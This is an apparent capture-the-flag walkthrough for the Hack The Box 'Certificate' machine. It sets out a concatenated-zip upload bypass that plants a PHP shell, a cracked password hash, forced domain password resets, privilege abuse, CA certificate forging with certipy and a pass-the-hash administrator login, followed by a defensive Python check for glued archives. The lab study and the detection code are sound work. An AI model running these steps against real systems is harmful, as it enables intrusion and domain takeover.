01-06-25, 10:58 AM
User.txt
1. Register a student account at http://certificate.htb
2. Find a course with an "exam" submission. An example is "How to be the next Leonardo Da Vinci" (http://certificate.htb/upload.php?s_id=36)
3. Create a concatenated zip file containing a reverse shell/web shell payload:
Code:
zip benign.zip test.pdf
mkdir payload
# put a reverse shell in payload/shell.php
zip -r finalexam.zip payload/
cat benign.zip finalexam.zip > mal.zip
# upload mal.zip
Go to the provided URL and change to payload/shell.php
http://certificate.htb/static/uploads/<junk>/payload/shell.php
4. Once you have a reverse shell as xamppuser, navigate to C:\xampp\htdocs\certificate.htb\db.php to find database credentials
5. Find sara.b's password hash: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6 and crack it (evil-winrm -i 10.10.11.71 -u 'Sara.B' -p 'Blink182')
6. Sara.b has GenericAll over Lion.sk and Ryan.k. You can reset their passwords:
Code:
net rpc password "lion.sk" "somepassword123" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
net rpc password "ryan.k" "somepassword123" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
root.txt
7. As ryan.k, you can abuse SeManageVolumePrivilege with https://github.com/xct/SeManageVolumeAbuse. Compile and run it via evil-winrm.
8. Export root cert and forge it
Code:
.\SeManageVolumeAbuse.exe
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx
cd C:\Users\Public\
download ca.pfx
certipy-ad forge -ca-pfx ca.pfx -upn 'Administrator@certificate.htb'
faketime "$(ntpdate -q certificate.htb | cut -d ' ' -f 1,2)" certipy-ad auth -pfx administrator_forged.pfx -dc-ip $IP
evil-winrm -i $IP -u "Administrator" -H 'd804304519bf0143c14cbf1c024408c6'
Enjoy :)
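A defender-side check for the concatenated archive in step 3, as an added example that is not part of the original post: it measures how many bytes sit in front of the archive described by the last end-of-central-directory record and rejects uploads where a second ZIP is hiding there. The names `leading_bytes` and `check_upload` are hypothetical, the sample archives are constructed, and ZIP64 archives are assumed out of scope.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end-of-central-directory signature
EOCD_LEN = 22              # fixed part of the record, without the comment


def leading_bytes(data: bytes) -> int:
    """Bytes in front of the archive that the last EOCD record describes."""
    pos = data.rfind(EOCD_SIG)
    if pos < 0 or pos + EOCD_LEN > len(data):
        raise ValueError("no end-of-central-directory record")
    cd_size, cd_offset = struct.unpack_from("<LL", data, pos + 12)
    # In a plain (non-ZIP64) archive the central directory ends where EOCD starts.
    return pos - cd_size - cd_offset


def check_upload(data: bytes) -> dict:
    """Report whether an upload is one ZIP or several glued together."""
    extra = leading_bytes(data)
    report = {"leading_bytes": extra, "concatenated": False,
              "last_archive": zipfile.ZipFile(io.BytesIO(data)).namelist(),
              "first_archive": None}
    if extra > 0 and EOCD_SIG in data[:extra]:
        # The prefix is itself a ZIP: a parser reading front-to-back lists it instead.
        report["concatenated"] = True
        report["first_archive"] = zipfile.ZipFile(io.BytesIO(data[:extra])).namelist()
    # Accept only archives that start at byte 0 of the upload.
    report["accept"] = extra == 0
    return report


def _make_zip(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed sample input: one clean archive, and the same archive with a second one appended.
CLEAN = _make_zip({"test.pdf": b"%PDF-1.4 constructed sample"})
GLUED = CLEAN + _make_zip({"payload/shell.php": b"placeholder, not a payload"})
```

Validating and extracting with the same parser, and rejecting any upload where `leading_bytes` is non-zero, closes the gap between what is checked and what is unpacked.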